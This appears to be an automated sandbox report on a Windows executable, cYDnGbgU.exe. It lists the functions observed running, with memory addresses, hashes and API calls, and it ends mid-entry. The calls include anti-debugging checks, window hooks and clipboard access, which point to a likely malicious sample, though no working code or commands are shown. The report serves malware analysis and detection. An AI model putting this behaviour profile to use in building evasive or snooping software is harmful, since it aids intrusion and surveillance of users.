Opcode ID: a9aa1ae30b550d3139db7f49fdfc76249f18d1e38eef7e7e438f715f02cd6fe0
Instruction ID: 270471258fd59faf977684c2a51c516b9699a083ed778ff10ce7c1493e2e283a
Opcode Fuzzy Hash: a9aa1ae30b550d3139db7f49fdfc76249f18d1e38eef7e7e438f715f02cd6fe0
Instruction Fuzzy Hash: 9FF06272405384AEE7218E5ADC84B62FFA8EF51635F19C55AFD084B2C6C379A844CAB1

Analysis Process: cYDnGbgU.exePID: 7444, Parent PID: 2836COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	149
Total number of Limit Nodes:	14

Executed Functions

Function 071C3130 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 071C383B
$dq, xrefs: 071C385F
$dq, xrefs: 071C3853
$dq, xrefs: 071C3806
$dq, xrefs: 071C382F
$dq, xrefs: 071C3812

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: dbfdf3bd2f835377d00e4047bddffc3ae9e486a5d07afa3645eeebca18e766fb
Instruction ID: f56be6376383d08114ef026234773d968de576f04a7e64a72523795e9df2a9f7
Opcode Fuzzy Hash: dbfdf3bd2f835377d00e4047bddffc3ae9e486a5d07afa3645eeebca18e766fb
Instruction Fuzzy Hash: BA324F70E1071A8FDB14EFB8C9545ADB7B2FF99300F20D669D409A7264EB309E85CB91

Function 071C7A40 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 071C7FDB
$dq, xrefs: 071C7FE7

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: 20d85aef58a03205ba92751e289113b0bac6d29817811a7e8a51a3dbe4f85822
Instruction ID: 13eeeee7ca0fdda20ddf3b0a70c19ba9dfc92c512172e8f064bf8fc1db021118
Opcode Fuzzy Hash: 20d85aef58a03205ba92751e289113b0bac6d29817811a7e8a51a3dbe4f85822
Instruction Fuzzy Hash: B402BD70B002169FDB15DBA8D590AAEB7E6FF98310F248529E805DB3D4DB74ED42CB90

Function 071C59AB Relevance: 2.9, Strings: 2, Instructions: 430
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPiq, xrefs: 071C5C76
\Oiq, xrefs: 071C5ACA

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: XPiq$\Oiq
API String ID: 0-4187271475
Opcode ID: d39a4ba5881b1137ad30dc2f51e75610a803365962f25d51e69f82b38bb097ee
Instruction ID: 34ba31b4d1edc9346d52fd9f5da88d68216b9cb4a3c1a59f899089393404d4f6
Opcode Fuzzy Hash: d39a4ba5881b1137ad30dc2f51e75610a803365962f25d51e69f82b38bb097ee
Instruction Fuzzy Hash: 11E10171B101158FCB11DBA8C490AAEBBB6FB99720F2584AED406DB391CB31EC51C7A1

Function 071C5268 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

$, xrefs: 071C561E

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 684e6dccbef2adb96c40bd247d35f1b03057583f391361713f02d1ba7125ac45
Instruction ID: 5ed098147237e89652054043cbe902369f3d14140ffe0438a371d09a561e400c
Opcode Fuzzy Hash: 684e6dccbef2adb96c40bd247d35f1b03057583f391361713f02d1ba7125ac45
Instruction Fuzzy Hash: 6022B2B1E002168FDF21DBA4C5406AEBBB3EF95310F24846AD845AB395DB75EC51CB90

Function 071C2410 Relevance: 1.0, Instructions: 1015COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6535d5f2856ffb459333756010b475287fa0cf1462a8036f0cf37aa2df6d47f3
Instruction ID: d19f7d58121b226aeb4a9b1be65ee710f65504661059040b498c1b4bd1599957
Opcode Fuzzy Hash: 6535d5f2856ffb459333756010b475287fa0cf1462a8036f0cf37aa2df6d47f3
Instruction Fuzzy Hash: 9B9257B4A002058FDB25DBA8C584B5DBBF2FB49315F54C4A9D419EB3A1DB35EC81CB81

Function 071C62B8 Relevance: .8, Instructions: 819COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488fae12402d02572018d63401c7c433f52aa303a16b59b3677c273ee0f2d744
Instruction ID: 75b0575cfe3ca3d50fba70b908351efb32241b2d52dc5a050fc5536b7416c05c
Opcode Fuzzy Hash: 488fae12402d02572018d63401c7c433f52aa303a16b59b3677c273ee0f2d744
Instruction Fuzzy Hash: 3162CFB4B002159FDB15DBA8D594AADB7F2FF98310F148469E809EB394DB35EC42CB81

Function 071CC248 Relevance: .6, Instructions: 646COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b17c2a414ce3a173db0e4c70810d59766f07e57dbbcb221aec2e1d854516a3
Instruction ID: f4e704264ce68a1dd713c0e63d0d523afa7f72666b764b53a66733183a68721c
Opcode Fuzzy Hash: 63b17c2a414ce3a173db0e4c70810d59766f07e57dbbcb221aec2e1d854516a3
Instruction Fuzzy Hash: EA3293B0B002158FDB15DFA8D5907ADBBF6EB89310F109529E509EB395DB34DC42CBA1

Function 071CB2E7 Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b090f998d6fa84e358fa7fc85d80d6ac04f99f9f685de8b135159c47bf6eb5dc
Instruction ID: f02510b0c470ad008e58583b8493859a220bb83941ab519c48080fb0e687d835
Opcode Fuzzy Hash: b090f998d6fa84e358fa7fc85d80d6ac04f99f9f685de8b135159c47bf6eb5dc
Instruction Fuzzy Hash: 762271F0A0421A8FDF35DAACD4917AEB7B6EB59310F248429E449EB3D1CB35DC818B51

Function 071CAD90 Relevance: 10.4, Strings: 8, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 071CAF68
$dq, xrefs: 071CAF10
$dq, xrefs: 071CAF04
$dq, xrefs: 071CAF33
$dq, xrefs: 071CAF3F
$dq, xrefs: 071CAEBD
$dq, xrefs: 071CAF5C
$dq, xrefs: 071CAEB1

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: 655acc8695339f687eaeefc722aa5ed06ef0357d5f7e1d5dda9c010b19865b32
Instruction ID: f8703e13cfe3880bc5f6fb01990a62bcf2b620abd308b6140c21a614be4865a8
Opcode Fuzzy Hash: 655acc8695339f687eaeefc722aa5ed06ef0357d5f7e1d5dda9c010b19865b32
Instruction Fuzzy Hash: 32E184B0A0021A8FCB26DBA8D5406AEB7F6FF99311F20852DD405EB394DB74DD46CB91

Function 071CB708 Relevance: 8.0, Strings: 6, Instructions: 474COMMON

Download Yara Rule

Strings

$dq, xrefs: 071CBC7B
$dq, xrefs: 071CBC47
$dq, xrefs: 071CBC3B
$dq, xrefs: 071CBCAF
$dq, xrefs: 071CBCA3
$dq, xrefs: 071CBC6F

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: 6f76c8e0fa806bd183aedb66c6362ec4a82c9a07e0bd9af54cb2dc229494848e
Instruction ID: 949494eeff33a31339dffa5b3da2d1f6f2e9a7025a473cc883f1001ee93d9012
Opcode Fuzzy Hash: 6f76c8e0fa806bd183aedb66c6362ec4a82c9a07e0bd9af54cb2dc229494848e
Instruction Fuzzy Hash: 67029EF0A0421A8FDB35CFA8D5826ADB7B2FB55710F24892ED445EB290DB35DD81CB81

Function 07156EC1 Relevance: 6.1, APIs: 4, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 07156F4E
GetCurrentThread.KERNEL32 ref: 07156F8B
GetCurrentProcess.KERNEL32 ref: 07156FC8
GetCurrentThreadId.KERNEL32 ref: 07157021

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 58fa2f297eb1c8e223b6d54687645fdaab6e8c81107e8e30b4b7da06cce6c8b9
Instruction ID: 08c0bb10186613220f8c047c5ed59ee875bb4dd30000477e7cd3415c05bb9597
Opcode Fuzzy Hash: 58fa2f297eb1c8e223b6d54687645fdaab6e8c81107e8e30b4b7da06cce6c8b9
Instruction Fuzzy Hash: C45155B090134ADFDB18DFA9D948B9EBBF1EF48314F20C859E419A7290DB355984CB61

Function 07156ED0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 07156F4E
GetCurrentThread.KERNEL32 ref: 07156F8B
GetCurrentProcess.KERNEL32 ref: 07156FC8
GetCurrentThreadId.KERNEL32 ref: 07157021

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ef15ee19efd030f5a8ee495d61b77e7275baf36987a7ca92f81ebf66748d66c5
Instruction ID: 9494ac3ba03f460486ee38b95e51a624abf6d1a2ca7e333cc2968e30afdec88a
Opcode Fuzzy Hash: ef15ee19efd030f5a8ee495d61b77e7275baf36987a7ca92f81ebf66748d66c5
Instruction Fuzzy Hash: 2C5135B0900309DFDB18DFA9D949B9EBBF1EF88314F20C859E419A7290DB359984CB65

Function 071C8E10 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 071C8E57
$dq, xrefs: 071C8E9E
$dq, xrefs: 071C8E92
$dq, xrefs: 071C8E63

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 4a90338e68882ccbd17b1676759269aec8edefc5d58a8713bee3a7a623a12776
Instruction ID: 1c70cde3290e1e826985bc00b7f1f66e8f6ff4ee93ef6f45b40ad05d008ae05b
Opcode Fuzzy Hash: 4a90338e68882ccbd17b1676759269aec8edefc5d58a8713bee3a7a623a12776
Instruction Fuzzy Hash: DF915070B0021A9FDB65DF64D9507AEB7F6EB89710F108469D809EB384EF34AD428F91

Function 071CD000 Relevance: 4.6, Strings: 3, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 071CD3FB
$dq, xrefs: 071CD407
$dq, xrefs: 071CD3F3

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq
API String ID: 0-2861643491
Opcode ID: bec1c12a92980fe413a2ea1116acb4e522d2f36f3f8a36aef8d5fcdd1e5451fb
Instruction ID: cc138fcc1af14e54894c473118b2e24e3622fa5279d1418e95020d81d904d8c8
Opcode Fuzzy Hash: bec1c12a92980fe413a2ea1116acb4e522d2f36f3f8a36aef8d5fcdd1e5451fb
Instruction Fuzzy Hash: 116271B07002168FCB15DBA8E590A5EB7F2FF94311F209968D4499F368DB35ED86CB81

Function 071C4830 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPiq, xrefs: 071C495D
\Oiq, xrefs: 071C49E7
fiq, xrefs: 071C4F3D

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: fiq$XPiq$\Oiq
API String ID: 0-1639307521
Opcode ID: c069aae1674e90749cd0dc769db4613be852a75a309ecd958c35c4a9e7a39e7f
Instruction ID: e29763b2cc9979e9aa3531df8736014fa253b468afb0612942fd1bec3b2286ec
Opcode Fuzzy Hash: c069aae1674e90749cd0dc769db4613be852a75a309ecd958c35c4a9e7a39e7f
Instruction Fuzzy Hash: B3616F70B002199FEF15DBE9C4147AEBAF6FB88710F208429D50AEB3D4DB748D458B95

Function 071C8E01 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 071C8E57
$dq, xrefs: 071C8E92

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: 9522c0aab68e5b98ca516bf25df95eb622ac01650d769373b302f61aed7116bd
Instruction ID: 459d1e1fa88abd586e45f0c2c7733473d5d733319d3023157b01a006f184ebc6
Opcode Fuzzy Hash: 9522c0aab68e5b98ca516bf25df95eb622ac01650d769373b302f61aed7116bd
Instruction Fuzzy Hash: B8516370B0021A9FDB65DB74D990BAE77FAEB88710F108469D809DB394EB34DD428B91

Function 018EF5A8 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4148473065.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_18e0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d817356f16dd4fdac3b40b96ffb57478ca1e98af8b896f80b29bd4118db94d
Instruction ID: 28c5ee03dd9e1a16278ba6d6221965d2cc214c94bf2c4398f8f47a4e8cd0a6ec
Opcode Fuzzy Hash: 82d817356f16dd4fdac3b40b96ffb57478ca1e98af8b896f80b29bd4118db94d
Instruction Fuzzy Hash: A34143B2D043999FC704CFB9D80469EBFF0AF8A310F14856AD508E7291EB389945CBD1

Function 071534CE Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071535EA

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5e3dec64110568abe840ba4d20adaafae135d6ff8edcdd2f24e1e34d3e85c66c
Instruction ID: 6c52eccd0d074df088824b7c847a91627b61956c32d49e74d7a7980cc3b48853
Opcode Fuzzy Hash: 5e3dec64110568abe840ba4d20adaafae135d6ff8edcdd2f24e1e34d3e85c66c
Instruction Fuzzy Hash: 9A51C4B5C00209EFDB15CF99D984ADDBFB5BF48354F24812AE828AB260D7719945CF50

Function 071534D8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071535EA

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 74e8578c1fc374c2d13d7967472a8a2b20e0aef12754805f06b209e4cc6ff8e8
Instruction ID: c5b5c0788bfb520ab46649f0f5bc329a25766f487a15251084d55c566c2ea74e
Opcode Fuzzy Hash: 74e8578c1fc374c2d13d7967472a8a2b20e0aef12754805f06b209e4cc6ff8e8
Instruction Fuzzy Hash: F941B0B1D10309DFDB18CF9AC984ADEBBB5BF48314F24812AE829AB250D7759945CF90

Function 07156D14 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 07158069

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e46d3cb0ac870851245024cb621030ec5b0298b3a63aba1d8cef0e3ed93af086
Instruction ID: 67e95b167a5a6665ddb65ddb9585d308b482a6afac45a67b6cda87f91e03f1c2
Opcode Fuzzy Hash: e46d3cb0ac870851245024cb621030ec5b0298b3a63aba1d8cef0e3ed93af086
Instruction Fuzzy Hash: E9416DB4900305DFCB18DF99C448AAABBF5FF88314F25C459D919AB3A1D375A840CFA0

Function 07158CE9 Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 07158D78

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: dfe7ecc0d1714636e14c8bb02dfdcae73a045176fbbf97c9d433369428b46a64
Instruction ID: 609a976ae5fc278d111415dde6d8bfcef5185bda54bac585f27b3146972f5820
Opcode Fuzzy Hash: dfe7ecc0d1714636e14c8bb02dfdcae73a045176fbbf97c9d433369428b46a64
Instruction Fuzzy Hash: DF3102B0D01209DFDB14DF99D984BCEBBF5AB48314F208019E408BB290DBB4A985CF61

Function 018E7EE1 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 018E7F5F

Memory Dump Source

Source File: 0000000D.00000002.4148473065.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_18e0000_cYDnGbgU.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 08e8c95a5b3f9f488656a0fe833d960b3f07f4a4b0a767d72c2bb4e88368c983
Instruction ID: f900789e5c90b1264b9691648c8f3ef14daf920f0e02de3fe268c528fc9ca3ae
Opcode Fuzzy Hash: 08e8c95a5b3f9f488656a0fe833d960b3f07f4a4b0a767d72c2bb4e88368c983
Instruction Fuzzy Hash: 022169B58012198FCB00CF99D885BEEBBF4EF49310F14841AE859A3381D378AA44CFA1

Function 07158CF0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 07158D78

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 308e96d17d02a432af8dce308f27a98ee1e7449e609ef8860f72b15085108fd2
Instruction ID: 3b4aa1be60910c09861045dc04d7b4c5e8147e8facaf3c9836e8dac87efdef27
Opcode Fuzzy Hash: 308e96d17d02a432af8dce308f27a98ee1e7449e609ef8860f72b15085108fd2
Instruction Fuzzy Hash: 1131DFB0D01349EFDB18DF99C984B8EBBF5AF48314F248059E508BB290DBB5A945CF61

Function 07156D48 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071582B5), ref: 0715833F

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: e77f356c03d77ed081241986c449cb1d92af16e6601fa384d1f9ff2640ceb7ee
Instruction ID: 1236e38f3cc65f2b6559bc8ae8a8371fda700c888408a2228136e2f3fc6995a0
Opcode Fuzzy Hash: e77f356c03d77ed081241986c449cb1d92af16e6601fa384d1f9ff2640ceb7ee
Instruction Fuzzy Hash: E4217CB5805398CFCB12DF99D8547DABFF4EF4A320F15448AD458AB292C3346948CBA6

Function 018E7EE8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 018E7F5F

Memory Dump Source

Source File: 0000000D.00000002.4148473065.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_18e0000_cYDnGbgU.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 45cd22f8915e098779444caf298f4a9b95b3841bc2260bb91f9e0ee1d9d076d7
Instruction ID: 36a0d9d42b55ce49d2d0cf0dc36dd98b9b704a51630a457ef2e82df5875876ec
Opcode Fuzzy Hash: 45cd22f8915e098779444caf298f4a9b95b3841bc2260bb91f9e0ee1d9d076d7
Instruction Fuzzy Hash: AE2139B18002598FCB14CF9AD844BEEFBF4EF49310F14845AE559A7391D778AA44CFA1

Function 07157110 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0715719F

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 49eb49f8752baf534760aa29f0edd70aa1f72b458b9113863ea2436b5ccab7e4
Instruction ID: 011c75cb7f8b6701f34cb7e6f42ad56a6e1f0a65542eef6c332c5710f642cc96
Opcode Fuzzy Hash: 49eb49f8752baf534760aa29f0edd70aa1f72b458b9113863ea2436b5ccab7e4
Instruction Fuzzy Hash: F02107B5900348AFDB10CFA9D985ADEBFF4EB48310F14841AE954A7351D374A944CFA1

Function 07157118 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0715719F

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f99d932d7e3fe569b502d96d429ad4d66b6d7b35f5cf45d2115e7f0b63bc0a8c
Instruction ID: 649b42ef67aeff5f0411645aa0ef7cd9a30bd37a6715731da550e86c97f3ba7a
Opcode Fuzzy Hash: f99d932d7e3fe569b502d96d429ad4d66b6d7b35f5cf45d2115e7f0b63bc0a8c
Instruction Fuzzy Hash: CA21E4B5900308AFDB10CFAAD985ADEBBF5FB48310F14841AE918A7350D374A944CFA1

Function 0715A7E3 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0715A863

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 08eb74fdff12d81767b220d39404a367fb147e677f7295603c1c24782a67d1fb
Instruction ID: 90e02aa93325b2d7b034e44167c1054724ae33e62d9c7ef54c21aa5612ced26a
Opcode Fuzzy Hash: 08eb74fdff12d81767b220d39404a367fb147e677f7295603c1c24782a67d1fb
Instruction Fuzzy Hash: 8221F5B59002099FCB14DF99D945ADEBBF5AF88310F10841AD419A7290C775A945CFA1

Function 0715A7E8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0715A863

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8be6b7f41c5f6e278269bedbe615e6861c22c0c1dea6e381a9aa6fa4651b3d68
Instruction ID: 6759e85685548415efafa6e6c6ba156d3683ced5edaa5db5e4c88513c8cbfee4
Opcode Fuzzy Hash: 8be6b7f41c5f6e278269bedbe615e6861c22c0c1dea6e381a9aa6fa4651b3d68
Instruction Fuzzy Hash: C52113B1D002099FCB14DF9AD945BEEFBF5EF88310F10842AD829A7290C774A945CFA1

Function 018EF690 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 018EF6F7

Memory Dump Source

Source File: 0000000D.00000002.4148473065.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_18e0000_cYDnGbgU.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c2ec6f75ad066c20e1e19f728e5dada38c056eef06d422184e0d8615c2c9fc2b
Instruction ID: 9bb6670caa04f5b08d86a691e26b4b37eab95f33acc62e98632ce571440fb14c
Opcode Fuzzy Hash: c2ec6f75ad066c20e1e19f728e5dada38c056eef06d422184e0d8615c2c9fc2b
Instruction Fuzzy Hash: 891114B1C006599BCB10DF9AD944A9EFBF4FF48320F11812AD518B7280D778A944CFA1

Function 0715242A Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 07152496

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

